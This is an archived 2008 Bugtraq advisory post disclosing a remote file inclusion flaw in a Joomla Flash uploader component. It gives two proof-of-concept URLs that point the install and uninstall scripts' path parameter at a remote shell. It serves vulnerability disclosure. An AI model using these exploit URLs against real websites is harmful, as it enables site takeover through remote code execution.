Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Bugtraq: Bugtraq

JoomlaFlash Component Multiple Remote File Inclusion

  

 
Bugtraq bugtraq RSS feed   Index | Next | Previous | View Threaded


Smasher at ciucciamiilcalzino

Jan 16, 2008, 4:06 PM

Post #1 of 1 (5049 views)
Permalink
JoomlaFlash Component Multiple Remote File Inclusion
Autore: Smasher
Sito: http://warwolfz.altervista.org
Tipo: Remote File Inclusion
Rischio: Alto

A remote attacker can gain access to your website throug a Remote shell inclusion.

PoC available:

http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell?

Regards.
Smasher

Bugtraq bugtraq RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact Gossamer Threads
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.